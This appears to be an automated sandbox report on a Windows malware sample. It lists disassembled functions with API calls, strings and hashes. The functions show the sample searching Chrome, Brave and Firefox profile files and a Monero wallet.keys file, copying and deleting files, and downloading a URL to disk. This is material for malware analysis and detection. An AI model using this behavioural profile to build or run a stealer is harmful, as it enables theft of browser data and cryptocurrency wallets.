Preferences, xrefs: 0036C11E

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 640b0550bcc28d227ce2eaae8aad48b9263961ec5004d6a0bb4b05c3389a78d8
Instruction ID: 431164bfcc6d46d7f11a0cae64c3fc436d8c66860a488c35a54428714a636f9b
Opcode Fuzzy Hash: 640b0550bcc28d227ce2eaae8aad48b9263961ec5004d6a0bb4b05c3389a78d8
Instruction Fuzzy Hash: 9D4246719101086BCB66FBB0DD96EEE737CAB94300F40C558F50E9A185EF389B49DB92

Function 00374910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 0037492C
FindFirstFileA.KERNEL32(?,?), ref: 00374943
StrCmpCA.SHLWAPI(?,00380FDC), ref: 00374971
StrCmpCA.SHLWAPI(?,00380FE0), ref: 00374987
FindNextFileA.KERNEL32(000000FF,?), ref: 00374B7D
FindClose.KERNEL32(000000FF), ref: 00374B92

Strings

%s\*, xrefs: 00374920
%s\%s, xrefs: 003749A4
%s\%s, xrefs: 003749FB

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 941267eac0571d6ff105da9d0cf940d3bfdf37a3a0d3c5ae15ca060f71e42631
Instruction ID: eb3333d6be339e110a568c13e6e6cc31ed62ac6f503e253fabd07642b99336d9
Opcode Fuzzy Hash: 941267eac0571d6ff105da9d0cf940d3bfdf37a3a0d3c5ae15ca060f71e42631
Instruction Fuzzy Hash: 096176B2900218ABCB75EBA0DC45FEA737CBB59700F048588F60D96040EB74EB89CF91

Function 00373EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00373EC3
FindFirstFileA.KERNEL32(?,?), ref: 00373EDA
StrCmpCA.SHLWAPI(?,00380FAC), ref: 00373F08
StrCmpCA.SHLWAPI(?,00380FB0), ref: 00373F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 0037406C
FindClose.KERNEL32(000000FF), ref: 00374081

Strings

%s\%s, xrefs: 00373EB7

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 2a8c945f1677c4a7c3b1d484f249fdd4404f3fdb058fb28ddc0fbcfad96a7aa6
Instruction ID: c168d3189c0ef92b39eb65d4a43c564dc54f935d464376fd94836101089ee7d5
Opcode Fuzzy Hash: 2a8c945f1677c4a7c3b1d484f249fdd4404f3fdb058fb28ddc0fbcfad96a7aa6
Instruction Fuzzy Hash: 9A5165B2900218ABCB75EBB0DC85EEE737CBB55300F008589B75D96040EB79AB89DF51

Function 0036F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Part of subcall function 0037A920: lstrcpy.KERNEL32(00000000,?), ref: 0037A972
Part of subcall function 0037A920: lstrcat.KERNEL32(00000000), ref: 0037A982

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003815B8,00380D96), ref: 0036F71E
StrCmpCA.SHLWAPI(?,003815BC), ref: 0036F76F
StrCmpCA.SHLWAPI(?,003815C0), ref: 0036F785
FindNextFileA.KERNELBASE(000000FF,?), ref: 0036FAB1
FindClose.KERNEL32(000000FF), ref: 0036FAC3

Strings

prefs.js, xrefs: 0036F812

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: b35548b798054cfdaa78905d6c25db3317ccb40c403b613e5b51e71978373c33
Instruction ID: fe009a12dc8fe38d2708f19883312c907626411e554335952041715f207b5370
Opcode Fuzzy Hash: b35548b798054cfdaa78905d6c25db3317ccb40c403b613e5b51e71978373c33
Instruction Fuzzy Hash: 5FB14271900608ABCB26FB64DC96AEE7779AF95300F40C1A8A50E9B145EF345B49CF92

Function 003616D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0038510C,?,?,?,003851B4,?,?,00000000,?,00000000), ref: 00361923
StrCmpCA.SHLWAPI(?,0038525C), ref: 00361973
StrCmpCA.SHLWAPI(?,00385304), ref: 00361989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00361D40
DeleteFileA.KERNEL32(00000000), ref: 00361DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 00361E20
FindClose.KERNEL32(000000FF), ref: 00361E32

Part of subcall function 0037A920: lstrcpy.KERNEL32(00000000,?), ref: 0037A972
Part of subcall function 0037A920: lstrcat.KERNEL32(00000000), ref: 0037A982

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

Strings

\*.*, xrefs: 003617F1

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 2bb47c8ba341389f8032a04ef42f56c96af607ad5c29727ecd3135331cb155b4
Instruction ID: 9c2a11a8a5bbc236712c93792cdb08775234fb2b30907dfdc7e718a560f80aeb
Opcode Fuzzy Hash: 2bb47c8ba341389f8032a04ef42f56c96af607ad5c29727ecd3135331cb155b4
Instruction Fuzzy Hash: 8712167191051CABDB66FB60CC96EEE7778AF94300F408199B11E6A091EF346F49CF92

Function 0036DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Part of subcall function 0037A920: lstrcpy.KERNEL32(00000000,?), ref: 0037A972
Part of subcall function 0037A920: lstrcat.KERNEL32(00000000), ref: 0037A982

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003814B0,00380C2A), ref: 0036DAEB
StrCmpCA.SHLWAPI(?,003814B4), ref: 0036DB33
StrCmpCA.SHLWAPI(?,003814B8), ref: 0036DB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 0036DDCC
FindClose.KERNEL32(000000FF), ref: 0036DDDE

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: c8856c73d665e351e79aab378688a1c44ca923c9cb3a6409c28a25021ff07b29
Instruction ID: f332018ebf75332d5ab9511e895c979cdc91008011d212d885037ba146c07d4c
Opcode Fuzzy Hash: c8856c73d665e351e79aab378688a1c44ca923c9cb3a6409c28a25021ff07b29
Instruction Fuzzy Hash: CB914572900608A7CB16FBB4DC969EE777CABD4300F40C558F91A9A145EF389B19CB93

Function 003660A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0037A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0037A7E6

Part of subcall function 003647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00364839
Part of subcall function 003647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00364849

InternetOpenA.WININET(00380DF7,00000001,00000000,00000000,00000000), ref: 0036610F
StrCmpCA.SHLWAPI(?,0114EBA8), ref: 00366147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0036618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 003661B3
InternetReadFile.WININET(?,?,00000400,?), ref: 003661DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0036620A
CloseHandle.KERNEL32(?,?,00000400), ref: 00366249
InternetCloseHandle.WININET(?), ref: 00366253
InternetCloseHandle.WININET(00000000), ref: 00366260

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: de32f4328a1912deee846e61b22d76b40daac04e2ba8e340872de012dd0a5550
Instruction ID: 6a68a0520e167924a0cb94c7557f20a875d38322695851398e6edd82311acc71
Opcode Fuzzy Hash: de32f4328a1912deee846e61b22d76b40daac04e2ba8e340872de012dd0a5550
Instruction Fuzzy Hash: 295190B1900218ABDB21DF60CC5ABEE77B8EB44301F108498B609AB1C4DB746A89DF95

Function 00377B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

